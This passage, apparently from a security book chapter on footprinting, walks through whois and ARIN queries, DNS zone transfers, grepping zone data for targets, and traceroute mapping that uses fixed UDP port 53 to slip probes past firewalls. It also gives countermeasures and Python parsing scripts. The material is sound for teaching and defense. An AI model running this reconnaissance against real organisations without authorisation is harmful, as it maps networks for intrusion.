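    r"Record (last updated|created) on (\d{1,2}-[A-Za-z]{3}-\d{2})\."
)

SAMPLE_RECORD = """\
Record last updated on 13-Sep-95.
Record created on 30-May-95.
Database last updated on 14-Apr-99 13:20:47 EDT.
"""


def record_dates(reply: str) -> dict:
    """Return {'updated': date, 'created': date} for the dates that are present."""
    found = {}
    for label, stamp in RECORD_DATE.findall(reply):
        key = "updated" if label.startswith("last") else "created"
        found[key] = datetime.strptime(stamp, "%d-%b-%y").date()
    return found


def years_between(earlier: date, later: date) -> float:
    """Approximate number of years between two dates."""
    return (later - earlier).days / 365.25


dates = record_dates(SAMPLE_RECORD)
# Reference date taken from the "Database last updated" line of the sample.
age = years_between(dates["updated"], date(1999, 4, 14))
print(f"record last touched {age:.1f} years before the database snapshot")
```

A record that has gone untouched for several years is a hint that the contact details should be verified through another source before they are relied upon.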
The last piece of information provides you with the authoritative DNS servers. The
first one listed is the primary DNS server, and subsequent DNS servers will be secondary,
tertiary, and so on. We will need this information for our DNS interrogation discussed
later in this chapter. Additionally, we can try to use the network range listed as a starting
point for our network query of the ARIN database.
Using a server directive with the HST record gained from a whois query, you can discover the other
domains for which a given DNS server is authoritative. The following steps show you how.
1. Execute a domain query as detailed earlier.
2. Locate the first DNS server.
3. Execute a whois query on that DNS server:
whois "HOST 10.10.10.1"@whois.networksolutions.com
4. Locate the HST record for the DNS server.
5. Execute a whois query with the server directive using whois and
the respective HST record:
whois "SERVER NS9999-HST"@whois.networksolutions.com
Network Query
The American Registry for Internet Numbers (ARIN) is another database that we can use
to determine networks associated with our target domain. This database maintains specific
network blocks that an organization owns. It is particularly important to perform
this search to determine if a system is actually owned by the target organization or if it is
being co-located or hosted by another organization such as an ISP.
In our example, we can try to determine all the networks that “Acme Networks”
owns. Querying the ARIN database is a particularly handy query because it is not subject
to the 50-record limit implemented by Network Solutions. Note the use of the “.” wildcard.
[bash]$ whois "Acme Net."@whois.arin.net
[whois.arin.net]
Acme Networks (ASN-XXXX) XXXX 99999
Acme Networks (NETBLK) 10.10.10.0 – 10.20.129.255
A more specific query can be submitted based upon a particular net block (10.10.10.0).
[bash]$ whois 10.10.10.0@whois.arin.net
[whois.arin.net]
Major ISP USA (NETBLK-MI-05BLK) MI-05BLK 10.10.0.0 - 10.30.255.255
ACME NETWORKS, INC. (NETBLK-MI-10-10-10) CW-10-10-10
10.10.10.0 - 10.20.129.255
ARIN provides a handy web-based query mechanism, as shown in Figure 1-4. By reviewing
the output, we can see that “Major ISP USA” is the main backbone provider and has
assigned a class A network (see TCP/IP Illustrated Volume 1 by Richard Stevens for a complete
discussion of TCP/IP) to Acme Networks. Thus, we can conclude that this is a valid
network owned by Acme Networks.
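The relationship between the two net blocks in the ARIN output can be checked mechanically. The Python sketch below uses the standard ipaddress module to confirm that the Acme Networks range lies inside the provider's range, to count the addresses it covers, and to express it as CIDR blocks for later scanning. The helper names are our own; the ranges are the sanitized ones from the sample output.

```python
import ipaddress

ISP_BLOCK = ("10.10.0.0", "10.30.255.255")    # Major ISP USA
ACME_BLOCK = ("10.10.10.0", "10.20.129.255")  # ACME NETWORKS, INC.


def block_size(first: str, last: str) -> int:
    """Number of addresses in the inclusive range first..last."""
    return int(ipaddress.ip_address(last)) - int(ipaddress.ip_address(first)) + 1


def is_within(inner: tuple, outer: tuple) -> bool:
    """True if the inclusive range `inner` lies entirely inside `outer`."""
    i_first, i_last = (ipaddress.ip_address(a) for a in inner)
    o_first, o_last = (ipaddress.ip_address(a) for a in outer)
    return o_first <= i_first and i_last <= o_last


def as_cidr(first: str, last: str) -> list:
    """Smallest list of CIDR networks that exactly covers the range."""
    return list(
        ipaddress.summarize_address_range(
            ipaddress.ip_address(first), ipaddress.ip_address(last)
        )
    )


print(is_within(ACME_BLOCK, ISP_BLOCK), block_size(*ACME_BLOCK))
for net in as_cidr(*ACME_BLOCK):
    print(net)
```

Because the registered range does not start or end on a single prefix boundary, it expands to several CIDR blocks rather than one.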
Figure 1-4. One of the easiest ways to search for ARIN information is from their web site.
POC Query
Since the administrative contact may be the administrative contact for multiple organizations,
it is advantageous to perform a point of contact (POC) query to search by the user’s
database handle. The handle we are searching for is “WB9201,” derived from the preceding
domain query. You may uncover a domain that you were unaware of.
[bash]$ whois "HANDLE WB9201"@whois.networksolutions.com
Boyd, Woody [Network Engineer] (WB9201) woody@ACME.NET
BIG ENTERPRISES
11 TOWN CENTER AVE
EINSTEIN, AZ 20198
201-555-1212 (201)555-1212 (FAX) 201-555-1212
We could also search for @Acme.net to obtain a listing of all mail addresses for a given
domain. We have truncated the following results for brevity:
[bash]$ whois "@acme.net"@whois.networksolutions.com
Smith, Janet (JS9999) jsmith@ACME.NET (201)555-9211 (FAX) (201)555-3643
Benson, Bob (BB9999) bob@ACME.NET (201)555-0988
Manual, Eric(EM9999) ericm@ACME.NET (201)555-8484 (FAX) (201)555-8485
Bixon, Rob (RB9999) rbixon@ACME.NET (201)555-8072
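A listing like this is the raw material for both social engineering and wardialing, so it is worth turning into structured data. The Python sketch below extracts the name, handle, and mail address from each line. The regular expression is an assumption based on the sample output above, including the entry that lacks a space before the handle.

```python
import re

# "Last, First (HANDLE) user@DOMAIN ..." with optional space before "("
POC_LINE = re.compile(
    r"^(?P<name>[^()]+?)\s*\((?P<handle>[A-Z0-9]+)\)\s+(?P<email>\S+@\S+)"
)

SAMPLE_POCS = """\
Smith, Janet (JS9999) jsmith@ACME.NET (201)555-9211 (FAX) (201)555-3643
Benson, Bob (BB9999) bob@ACME.NET (201)555-0988
Manual, Eric(EM9999) ericm@ACME.NET (201)555-8484 (FAX) (201)555-8485
Bixon, Rob (RB9999) rbixon@ACME.NET (201)555-8072
"""


def parse_pocs(reply: str) -> list:
    """Return (name, handle, email) tuples for every line that parses."""
    contacts = []
    for line in reply.splitlines():
        match = POC_LINE.match(line.strip())
        if match:
            contacts.append(
                (match.group("name"), match.group("handle"),
                 match.group("email").lower())
            )
    return contacts


for name, handle, email in parse_pocs(SAMPLE_POCS):
    print(f"{handle:8} {email:20} {name}")
```

Each handle in the result can be fed back into a HANDLE query to see which other domains that person administers.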
Countermeasure: Public Database Security
Much of the information contained in the various databases discussed thus far is geared
toward public disclosure. Administrative contacts, registered net blocks, and authoritative
name server information are required when an organization registers a domain on the
Internet. However, security considerations should be employed to make the job of attackers
much more difficult.
Many times an administrative contact will leave an organization and still be able to
change the organization’s domain information. Thus, first ensure that the information listed
in the database is accurate. Update the administrative, technical, and billing contact information
as necessary. Furthermore, consider the phone numbers and addresses listed. These
can be used as a starting point for a dial-in attack or for social engineering purposes. Consider
using a toll-free number or a number that is not in your organization’s phone exchange.
In addition, we have seen several organizations list a fictitious administrative
contact, hoping to trip up a would-be social engineer. If any employee receives an email or
calls to or from the fictitious contact, it may tip off the information security department that
there is a potential problem.
Another hazard with domain registration arises from the way that some registrars allow
updates. For example, the current Network Solutions implementation allows automated
online changes to domain information. Network Solutions authenticates the domain registrant’s
identity through three different methods: the FROM field in an email, a password,
or via a Pretty Good Privacy (PGP) key. Shockingly, the default authentication method is
the FROM field via email. The security implications of this authentication mechanism are
prodigious. Essentially, anyone can trivially forge an email address and change the information
associated with your domain, better known as domain hijacking. This is exactly what
happened to AOL on October 16, 1998, as reported by the Washington Post. Someone impersonated
an AOL official and changed AOL’s domain information so that all traffic was
directed to autonete.net. AOL recovered quickly from this incident, but it underscores
the fragility of an organization’s presence on the Internet. It is important to choose a more
secure solution like password or PGP authentication to change domain information.
Moreover, the administrative or technical contact is required to establish the authentication
mechanism via Contact Form from Network Solutions.
Step 3. DNS Interrogation
After identifying all the associated domains, you can begin to query the DNS. DNS is a
distributed database used to map IP addresses to hostnames and vice versa. If DNS is
configured insecurely, it is possible to obtain revealing information about the organization.
Zone Transfers
Popularity: 9
Simplicity: 9
Impact: 3
Risk Rating: 7
One of the most serious misconfigurations a system administrator can make is allowing
untrusted Internet users to perform a DNS zone transfer.
A zone transfer allows a secondary master server to update its zone database from the
primary master. This provides for redundancy when running DNS, should the primary
name server become unavailable. Generally, a DNS zone transfer only needs to be performed
by secondary master DNS servers. Many DNS servers, however, are misconfigured
and provide a copy of the zone to anyone who asks. This isn’t necessarily bad if the only information
provided is related to systems that are connected to the Internet and have valid
hostnames, although it makes it that much easier for attackers to find potential targets. The
real problem occurs when an organization does not use a public/private DNS mechanism
to segregate its external DNS information (which is public) from its internal, private DNS
information. In this case, internal hostnames and IP addresses are disclosed to the attacker.
Providing internal IP address information to an untrusted user over the Internet is akin to
providing a complete blueprint, or roadmap, of an organization’s internal network.
Let’s take a look at several methods we can use to perform zone transfers and the
types of information that can be gleaned. While there are many different tools to perform
zone transfers, we are going to limit the discussion to several common types.
A simple way to perform a zone transfer is to use the nslookup client that is usually
provided with most UNIX and NT implementations. We can use nslookup in interactive
mode as follows:
[bash]$ nslookup
Default Server: dns2.acme.net
Address: 10.10.20.2
>> server 10.10.10.2
Default Server: [10.10.10.2]
Address: 10.10.10.2
>> set type=any
>> ls -d Acme.net. >> /tmp/zone_out
We first run nslookup in interactive mode. Once started, it will tell you the default
name server that it is using, which is normally your organization’s DNS server or a DNS
server provided by your Internet service provider (ISP). However, our DNS server
(10.10.20.2) is not authoritative for our target domain, so it will not have all the DNS records
we are looking for. Thus, we need to manually tell nslookup which DNS server to
query. In our example, we want to use the primary DNS server for Acme Networks
(10.10.10.2). Recall that we found this information from our domain whois lookup performed
earlier.
Next we set the record type to any. This will allow you to pull any DNS records available
(see man nslookup for a complete list).
Finally, we use the ls option to list all the associated records for the domain. The -d
switch is used to list all records for the domain. We append a “.” to the end to signify the
fully qualified domain name; however, you can leave this off most times. In addition, we
redirect our output to the file /tmp/zone_out so that we can manipulate the output later.
After completing the zone transfer, we can view the file to see if there is any interesting
information that will allow us to target specific systems. Let’s review the output:
[bash]$ more zone_out
acct18 1D IN A 192.168.230.3
1D IN HINFO "Gateway2000" "WinWKGRPS"
1D IN MX 0 acmeadmin-smtp
1D IN RP bsmith.rci bsmith.who
1D IN TXT "Location:Telephone Room"
ce 1D IN CNAME aesop
au 1D IN A 192.168.230.4
1D IN HINFO "Aspect" "MS-DOS"
1D IN MX 0 andromeda
1D IN RP jcoy.erebus jcoy.who
1D IN TXT "Location: Library"
acct21 1D IN A 192.168.230.5
1D IN HINFO "Gateway2000" "WinWKGRPS"
1D IN MX 0 acmeadmin-smtp
1D IN RP bsmith.rci bsmith.who
1D IN TXT "Location:Accounting"
We won’t go through each record in detail, but we will point out several important
types. We see that for each entry we have an A record that gives the IP address (on the
right) of the system named on the left. In addition, each host has an HINFO record that identifies
the platform or type of operating system running (see RFC 952). HINFO records are
not needed, but provide a wealth of information to attackers. Since we saved the results of
the zone transfer to an output file, we can easily manipulate the results with UNIX programs
like grep, sed, awk, or perl.
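As an alternative to one-off grep commands, the saved listing can be loaded into a small data structure. The Python sketch below groups the records by host, treating any line that starts directly with the TTL as a continuation of the previous host. That rule is an assumption drawn from the sample listing above (every line carries a TTL followed by the class IN); real zone files allow more variation than this handles.

```python
import shlex

ZONE_SAMPLE = """\
acct18 1D IN A 192.168.230.3
1D IN HINFO "Gateway2000" "WinWKGRPS"
1D IN MX 0 acmeadmin-smtp
1D IN TXT "Location:Telephone Room"
ce 1D IN CNAME aesop
au 1D IN A 192.168.230.4
1D IN HINFO "Aspect" "MS-DOS"
"""


def parse_zone_listing(text: str) -> dict:
    """Map each host name to a list of (record type, [rdata fields])."""
    hosts = {}
    owner = None
    for line in text.splitlines():
        try:
            parts = shlex.split(line)  # keeps quoted strings together
        except ValueError:
            parts = line.split()       # unbalanced quote: fall back
        if len(parts) >= 4 and parts[1] == "IN":
            rtype, rdata = parts[2], parts[3:]   # owner omitted, reuse last
        elif len(parts) >= 5 and parts[2] == "IN":
            owner = parts[0]
            rtype, rdata = parts[3], parts[4:]
        else:
            continue
        if owner is not None:
            hosts.setdefault(owner, []).append((rtype, rdata))
    return hosts


def hinfo_by_host(hosts: dict) -> dict:
    """Map host name to its (hardware, operating system) HINFO pair."""
    return {
        name: tuple(rdata[:2])
        for name, records in hosts.items()
        for rtype, rdata in records
        if rtype == "HINFO" and len(rdata) >= 2
    }


for name, (hardware, system) in hinfo_by_host(parse_zone_listing(ZONE_SAMPLE)).items():
    print(name, hardware, system)
```

With the records grouped this way, a question such as "which hosts advertise a given operating system, and what are their addresses" becomes a dictionary lookup rather than a chain of text filters.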
Suppose we are experts in SunOS or Solaris. We could programmatically find out the
IP addresses that had an HINFO record associated with SPARC, Sun, or Solaris.
[bash]$ grep -i solaris zone_out |wc -l
388
We can see that we have 388 potential records that reference the word “Solaris.” Obviously,
we have plenty of targets.
Suppose we wanted to find test systems, which happen to be a favorite choice for attackers.
Why? Simple—they normally don’t have many security features enabled, often
have easily guessed passwords, and administrators tend not to notice or care who logs in
to them. They’re a perfect home for any interloper. Thus, we can search for test systems
as follows:
[bash]$ grep -i test /tmp/zone_out |wc -l
96
So we have approximately 96 entries in the zone file that contain the word “test.” This
should equate to a fair number of actual test systems. These are just a few simple examples.
Most intruders will slice and dice this data to zero-in on specific system types with
known vulnerabilities.
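The two grep pipelines above can be generalized into a single pass that tallies several keywords at once. The Python sketch below counts, for each keyword, the lines that contain it regardless of case, which is what grep -i piped into wc -l reports. The sample lines are hypothetical and exist only to exercise the function.

```python
def tally_keywords(lines, keywords):
    """Count lines containing each keyword, ignoring case (grep -i | wc -l)."""
    counts = {keyword: 0 for keyword in keywords}
    for line in lines:
        lowered = line.lower()
        for keyword in keywords:
            if keyword.lower() in lowered:
                counts[keyword] += 1
    return counts


# Hypothetical zone listing lines, in the same layout as the saved output.
SAMPLE_LINES = [
    'test1 1D IN A 192.168.230.10',
    '1D IN HINFO "Sun" "Solaris"',
    'www 1D IN A 192.168.230.11',
    '1D IN HINFO "SPARC" "SOLARIS 2.6"',
    'TESTBOX 1D IN A 192.168.230.12',
]

print(tally_keywords(SAMPLE_LINES, ["sparc", "sun", "solaris", "test"]))
```

Because an open file iterates over its lines, the same function accepts open("/tmp/zone_out") in place of the sample list.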
Keep a few points in mind. The aforementioned method only queries one nameserver at
a time. This means that you would have to perform the same tasks for all nameservers that
are authoritative for the target domain. In addition, we only queried the Acme.net domain.
If there were subdomains, we would have to perform the same type of query for each
subdomain (for example, greenhouse.Acme.net). Finally, you may receive a message stating
that you can’t list the domain or that the query was refused. This usually indicates that
the server has been configured to disallow zone transfers from unauthorized users. Thus,
you will not be able to perform a zone transfer from this server. However, if there are multiple
DNS servers, you may be able to find one that will allow zone transfers.
Now that we have shown you the manual method, there are plenty of tools that speed
the process, including host, Sam Spade, axfr, and dig.
The host command comes with many flavors of UNIX. Some simple ways of using
host are as follows:
host -l Acme.net
or
host -l -v -t any Acme.net
If you need just the IP addresses to feed into a shell script, you can just cut out the IP
addresses from the host command:
host -l acme.net |cut -f 4 -d" " >> /tmp/ip_out
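Taking the fourth space-separated field works as long as every line has the form "name has address IP", but the listing can contain other line types whose fourth field is not an address. The Python sketch below applies the same field selection and keeps only values that parse as IP addresses. The sample listing is hypothetical, modeled on the "has address" format that host prints.

```python
import ipaddress

# Hypothetical output in the style of `host -l`.
SAMPLE_HOST_LISTING = """\
Acme.net name server dns.Acme.net
www.Acme.net has address 10.10.10.5
mail.Acme.net has address 10.10.10.6
ftp.Acme.net is an alias for www.Acme.net
"""


def addresses_from_listing(text: str) -> list:
    """Return the fourth field of each line when it is a valid IP address."""
    addresses = []
    for line in text.splitlines():
        fields = line.split(" ")
        if len(fields) < 4:
            continue
        try:
            addresses.append(str(ipaddress.ip_address(fields[3])))
        except ValueError:
            continue  # fourth field was a host name or other text
    return addresses


print("\n".join(addresses_from_listing(SAMPLE_HOST_LISTING)))
```

The validation step means name server and alias lines are dropped instead of ending up in the address file.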
Not all footprinting functions must be performed through UNIX commands. A number
of Windows products provide the same information, as shown in Figure 1-5.
Figure 1-5. If you’re Windows inclined, you could use the multifaceted Sam Spade to perform a
zone transfer as well as other footprinting tasks.
Finally, you can use one of the best tools for performing zone transfers, axfr
(http://ftp.cdit.edu.cn/pub/linux/www.trinux.org/src/netmap/axfr-0.5.2.tar.gz) by Gaius. This
utility will recursively transfer zone information and create a compressed database of
zone and host files for each domain queried. In addition, you can even pass top-level domains
like com and edu to get all the domains associated with com and edu, respectively.
However, this is not recommended. To run axfr, you would type the following:
[bash]$ axfr Acme.net
axfr: Using default directory: /root/axfrdb
Found 2 name servers for domain 'Acme.net.':
Text deleted.
Received XXX answers (XXX records).
To query the axfr database for the information you just obtained, you would type
the following:
[bash]$ axfrcat Acme.net
Determine Mail Exchange (MX) Records
Determining where mail is handled is a great starting place to locate the target organization’s
firewall network. Often in a commercial environment, mail is handled on the same
system as the firewall, or at least on the same network. So we can use host to help harvest
even more information.
[bash]$ host Acme.net
Acme.net has address 10.10.10.1
Acme.net mail is handled (pri=20) by smtp-forward.Acme.net
Acme.net mail is handled (pri=10) by gate.Acme.net
If host is used without any parameters on just a domain name, it will try to resolve A
records first, then MX records. The preceding information appears to cross-reference
with the whois ARIN search we previously performed. Thus, we can feel comfortable
that this is a network we should be investigating.
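When many domains are involved, the mail exchangers can be pulled out of the host output and ranked automatically. The Python sketch below extracts each MX entry and sorts by preference value, lowest first, since the lowest value is the one mail is delivered to first. The regular expression is an assumption based on the output format shown above; newer versions of host may word these lines differently.

```python
import re

MX_LINE = re.compile(r"mail is handled \(pri=(\d+)\) by (\S+)")

SAMPLE_HOST_OUTPUT = """\
Acme.net has address 10.10.10.1
Acme.net mail is handled (pri=20) by smtp-forward.Acme.net
Acme.net mail is handled (pri=10) by gate.Acme.net
"""


def mail_exchangers(text: str) -> list:
    """Return (preference, host) pairs, most preferred exchanger first."""
    pairs = [(int(pri), name) for pri, name in MX_LINE.findall(text)]
    return sorted(pairs)


for preference, name in mail_exchangers(SAMPLE_HOST_OUTPUT):
    print(preference, name)
```

For the sample above, gate.Acme.net sorts first, which makes it the natural host to examine when looking for the perimeter.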
Countermeasure: DNS Security
DNS information provides a plethora of information to attackers, so it is important to reduce
the amount of information available to the Internet. From a host configuration perspective,
you should restrict zone transfers to only authorized servers. For modern versions of
BIND, the allow-transfer directive in the named.conf file can be used to enforce the restriction.
To restrict zone transfers in Microsoft’s DNS, you can use the Notify option. (See
http://support.microsoft.com/support/kb/articles/q193/8/37.asp for more information.)
For other nameservers, you should consult the documentation to determine what steps
are necessary to restrict or disable zone transfers.
On the network side, you could configure a firewall or packet-filtering router to deny
all unauthorized inbound connections to TCP port 53. Since name lookup requests are
UDP and zone transfer requests are TCP, this will effectively thwart a zone transfer attempt.
However, this countermeasure is a violation of the RFC, which states that DNS
queries greater than 512 bytes will be sent via TCP. In most cases, DNS queries will easily
fit within 512 bytes. A better solution would be to implement cryptographic Transaction
Signatures (TSIGs) to allow only “trusted” hosts to transfer zone information. For a
step-by-step example of how to implement TSIG security, see
http://romana.ucd.ie/james/tsig.html.
Restricting zone transfers will increase the time necessary for attackers to probe for
IP addresses and hostnames. However, since name lookups are still allowed, attackers
could manually perform lookups against all IP addresses for a given net block. Therefore,
configure external name servers to provide information only about systems directly
connected to the Internet. External nameservers should never be configured to
divulge internal network information. This may seem like a trivial point, but we have
seen misconfigured nameservers that allowed us to pull back more than 16,000 internal IP
addresses and associated hostnames. Finally, we discourage the use of HINFO records. As
you will see in later chapters, you can identify the target system’s operating system with
fine precision. However, HINFO records make it that much easier to programmatically
cull potentially vulnerable systems.
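To see why restricting zone transfers only slows an attacker down, consider how little effort it takes to enumerate a net block one address at a time. The Python sketch below uses the standard ipaddress module to generate the reverse-lookup (PTR) name for every host address in a block; each name could then be handed to an ordinary resolver. The function name and the limit parameter are our own, and no queries are actually sent.

```python
import ipaddress


def ptr_names(cidr: str, limit=None) -> list:
    """Reverse-lookup names for the host addresses in a CIDR block."""
    names = []
    for index, address in enumerate(ipaddress.ip_network(cidr).hosts()):
        if limit is not None and index >= limit:
            break
        names.append(address.reverse_pointer)
    return names


for name in ptr_names("10.10.10.0/24", limit=3):
    print(name)
print(len(ptr_names("10.10.10.0/24")), "lookups cover the whole /24")
```

A few hundred lookups per /24 is well within reach of a simple script, which is why external name servers should hold records only for systems that are meant to be publicly visible.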
Step 4. Network Reconnaissance
Now that we have identified potential networks, we can attempt to determine their network
topology as well as potential access paths into the network.
Tracerouting
Popularity: 9
Simplicity: 9
Impact: 2
Risk Rating: 7
To accomplish this task, we can use the traceroute (ftp://ftp.ee.lbl.gov/traceroute.tar.gz)
program that comes with most flavors of UNIX and is provided in Windows
NT. In Windows NT, it is spelled tracert due to the 8.3 legacy filename issues.
Traceroute is a diagnostic tool originally written by Van Jacobson that lets you
view the route that an IP packet follows from one host to the next. Traceroute uses the
time-to-live (TTL) field in the IP packet to elicit an ICMP TIME_EXCEEDED message
from each router. Each router that handles the packet is required to decrement the TTL
field. Thus, the TTL field effectively becomes a hop counter. We can use the functionality
of traceroute to determine the exact path that our packets are taking. As mentioned
previously, traceroute may allow you to discover the network topology employed by
the target network, in addition to identifying access control devices (application-based
firewall or packet-filtering routers) that may be filtering our traffic.
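The TTL mechanism is easier to follow with a small simulation. The Python sketch below models a path as a list of hops and sends probes with TTL values of 1, 2, 3, and so on; each router decrements the TTL and answers with TIME_EXCEEDED when it reaches zero, while the destination answers a UDP probe with a port-unreachable message. This is a model only: no packets are sent, the function names are our own, and the hop names are borrowed from the sanitized examples in this chapter.

```python
PATH = [
    "gate2",
    "rtr1.bigisp.net",
    "rtr2.bigisp.net",
    "hssitrt.bigisp.net",
    "gate.Acme.net",  # destination
]


def send_probe(path, ttl):
    """Return (responding hop, reply type) for one probe with the given TTL."""
    last = len(path) - 1
    for index, hop in enumerate(path):
        if index == last:
            return hop, "PORT_UNREACHABLE"  # probe reached the destination
        ttl -= 1                            # every router decrements the TTL
        if ttl == 0:
            return hop, "TIME_EXCEEDED"     # router drops the probe and reports
    raise ValueError("path must contain at least one hop")


def trace(path, max_hops=30):
    """Probe with increasing TTL until the destination answers."""
    results = []
    for ttl in range(1, max_hops + 1):
        hop, reply = send_probe(path, ttl)
        results.append((ttl, hop, reply))
        if reply != "TIME_EXCEEDED":
            break
    return results


for ttl, hop, reply in trace(PATH):
    print(ttl, hop, reply)
```

Each TTL value reveals exactly one hop, which is why the hop number in traceroute output doubles as the TTL that produced it.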
Let’s look at an example:
[bash]$ traceroute Acme.net
traceroute to Acme.net (10.10.10.1), 30 hops max, 40 byte packets
1 gate2 (192.168.10.1) 5.391 ms 5.107 ms 5.559 ms
2 rtr1.bigisp.net (10.10.12.13) 33.374 ms 33.443 ms 33.137 ms
3 rtr2.bigisp.net (10.10.12.14) 35.100 ms 34.427 ms 34.813 ms
4 hssitrt.bigisp.net (10.11.31.14) 43.030 ms 43.941 ms 43.244 ms
5 gate.Acme.net (10.10.10.1) 43.803 ms 44.041 ms 47.835 ms
We can see the path of the packets leaving the router (gate) and traveling three hops
(2–4) to the final destination. The packets go through the various hops without being
blocked. From our earlier work, we know that the MX record for Acme.net points to
gate.acme.net. Thus, we can assume this is a live host and that the hop before it (4) is the
border router for the organization. Hop 4 could be a dedicated application-based
firewall, or it could be a simple packet-filtering device—we are not sure yet. Generally,
once you hit a live system on a network, the system before it is a device performing routing
functions (for example, a router or a firewall).
This is a very simplistic example. But in a complex environment, there may be multiple
routing paths, that is, routing devices with multiple interfaces (for example, a Cisco 7500 series
router). Moreover, each interface may have different access control lists (ACLs) applied.
In many cases, some interfaces will pass your traceroute requests, while others will deny
them because of the ACL applied. Thus, it is important to map your entire network using
traceroute. After you traceroute to multiple systems on the network, you can begin to
create a network diagram that depicts the architecture of the Internet gateway and the location
of devices that are providing access control functionality. We refer to this as an access
path diagram.
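The raw material for an access path diagram is simply the set of hop-to-hop links seen across many traceroute runs. The Python sketch below parses saved traceroute output and merges the links into one adjacency map. The line format is assumed from the sample output in this chapter; hops that did not answer are skipped, and no link is drawn across such a gap.

```python
import re

# hop number, host name, then the address in parentheses
HOP_LINE = re.compile(r"^\s*(\d+)\s+(\S+)\s+\((\d+\.\d+\.\d+\.\d+)\)")

TRACE_A = """\
traceroute to Acme.net (10.10.10.1), 30 hops max, 40 byte packets
1 gate2 (192.168.10.1) 5.391 ms 5.107 ms 5.559 ms
2 rtr1.bigisp.net (10.10.12.13) 33.374 ms 33.443 ms 33.137 ms
3 rtr2.bigisp.net (10.10.12.14) 35.100 ms 34.427 ms 34.813 ms
4 hssitrt.bigisp.net (10.11.31.14) 43.030 ms 43.941 ms 43.244 ms
5 gate.Acme.net (10.10.10.1) 43.803 ms 44.041 ms 47.835 ms
"""

TRACE_B = """\
traceroute to (10.10.10.2), 30 hops max, 40 byte packets
3 rtr2.bigisp.net (10.10.12.14) 36.739 ms 39.516 ms 37.226 ms
4 hssitrt.bigisp.net (10.11.31.14) 47.352 ms 47.363 ms 45.914 ms
5 10.10.10.2 (10.10.10.2) 50.449 ms 56.213 ms 65.627 ms
"""


def parse_hops(output: str) -> list:
    """Return (hop number, name, address) for every hop that answered."""
    hops = []
    for line in output.splitlines():
        match = HOP_LINE.match(line)
        if match:
            hops.append((int(match.group(1)), match.group(2), match.group(3)))
    return hops


def access_paths(traces) -> dict:
    """Merge several traces into a map of address -> set of next-hop addresses."""
    graph = {}
    for output in traces:
        hops = parse_hops(output)
        for (n1, _, ip1), (n2, _, ip2) in zip(hops, hops[1:]):
            if n2 == n1 + 1:  # only link hops that are truly adjacent
                graph.setdefault(ip1, set()).add(ip2)
    return graph


for source, targets in access_paths([TRACE_A, TRACE_B]).items():
    print(source, "->", ", ".join(sorted(targets)))
```

A node with several outgoing links, such as hop 4 in these traces, is a likely candidate for a border router or other access control device.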
It is important to note that most flavors of traceroute in UNIX default to sending
User Datagram Protocol (UDP) packets, with the option of using Internet Control
Message Protocol (ICMP) packets with the -I switch. In Windows NT, however, the
default behavior is to use ICMP echo request packets. Thus, your mileage may vary using
each tool if the site blocks UDP vs. ICMP and vice versa. Another interesting option of
traceroute is the -g option, which allows the user to specify loose source routing.
Thus, if you believe the target gateway will accept source-routed packets (which is a cardinal
sin), you might try to enable this option with the appropriate hop pointers (see man
traceroute in UNIX for more information).
There are several other switches that we need to discuss that may allow us to bypass
access control devices during our probe. The -p n option of traceroute allows you to
specify a starting UDP port number (n) that will be incremented by 1 each time a probe is
launched. Thus, we will not be able to use a fixed port number without some modification to
traceroute. Luckily, Michael Schiffman has created a patch
(http://www.packetfactory.net/Projects/firewalk/traceroute.diff) that adds the -S switch to stop port incrementation
for traceroute version 1.4a5 (ftp.cerias.purdue.edu/pub/tools/unix/netutils/traceroute/old/).
This allows us to force every packet we send to have a fixed port number, in the
hopes that the access control device will pass this traffic. A good starting port number
would be UDP port 53 (DNS queries). Since many sites allow inbound DNS queries, there is
a high probability that the access control device will allow our probes through.
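The effect of port incrementation is easy to see by listing the destination port of each probe. The Python sketch below does so under a deliberately simplified model: the first probe goes to the starting port and every later probe adds 1, with three probes per hop as in the sample output. Real traceroute implementations may differ in the exact offset of the first probe, so treat the numbers as illustrative only; the function name and the fixed parameter (standing in for the -S patch) are our own.

```python
def probe_ports(start_port, hops, probes_per_hop=3, fixed=False):
    """Destination port of each probe, in the order the probes are sent."""
    total = hops * probes_per_hop
    if fixed:
        return [start_port] * total  # patched behavior: port never changes
    return [start_port + n for n in range(total)]


incrementing = probe_ports(53, hops=5)
pinned = probe_ports(53, hops=5, fixed=True)

print("incrementing:", incrementing)
print("probes aimed at port 53 without the patch:", incrementing.count(53))
print("probes aimed at port 53 with the patch:   ", pinned.count(53))
```

Under this model only one of the fifteen probes is addressed to port 53 unless the port is pinned, so an access control device that passes only DNS traffic would drop nearly all of an unpatched trace.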
[bash]$ traceroute 10.10.10.2
traceroute to (10.10.10.2), 30 hops max, 40 byte packets
1 gate (192.168.10.1) 11.993 ms 10.217 ms 9.023 ms
2 rtr1.bigisp.net (10.10.12.13) 37.442 ms 35.183 ms 38.202 ms
3 rtr2.bigisp.net (10.10.12.14) 73.945 ms 36.336 ms 40.146 ms
4 hssitrt.bigisp.net (10.11.31.14) 54.094 ms 66.162 ms 50.873 ms
5 * * *
6 * * *
We can see here that our traceroute probes, which by default send out UDP packets,
were blocked by the firewall.
Now let’s send a probe with a fixed port of UDP 53, DNS queries:
[bash]$ traceroute -S -p53 10.10.10.2
traceroute to (10.10.10.2), 30 hops max, 40 byte packets
1 gate (192.168.10.1) 10.029 ms 10.027 ms 8.494 ms
2 rtr1.bigisp.net (10.10.12.13) 36.673 ms 39.141 ms 37.872 ms
3 rtr2.bigisp.net (10.10.12.14) 36.739 ms 39.516 ms 37.226 ms
4 hssitrt.bigisp.net (10.11.31.14) 47.352 ms 47.363 ms 45.914 ms
5 10.10.10.2 (10.10.10.2) 50.449 ms 56.213 ms 65.627 ms
Because our packets are now acceptable to the access control devices (hop 4), they are
happily passed. Thus, we can probe systems behind the access control device just by
sending out probes with a destination port of UDP 53. Note, however, that if you send a
probe to a system that is actually listening on UDP port 53, you will not receive the
normal ICMP port unreachable message back, because the listening service accepts the
datagram. In that case, you will not see a host displayed when the packet reaches its
ultimate destination.
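When many targets are involved, comparing runs like the two above by eye gets tedious. The following is a minimal Python sketch, assuming output in the same layout as the listings shown here, that reports the last hop that answered in each run. The names parse_hops and last_responding_hop are hypothetical helpers written for this illustration, and the two sample strings are copied from the listings above.

```python
import re

# Matches lines such as "4 hssitrt.bigisp.net (10.11.31.14) 54.094 ms ..."
HOP_RE = re.compile(r"^\s*(\d+)\s+(\S+)\s+\((\d+\.\d+\.\d+\.\d+)\)")
# Matches lines such as "5 * * *" where no reply was received
TIMEOUT_RE = re.compile(r"^\s*(\d+)\s+\*")

BLOCKED = """traceroute to (10.10.10.2), 30 hops max, 40 byte packets
1 gate (192.168.10.1) 11.993 ms 10.217 ms 9.023 ms
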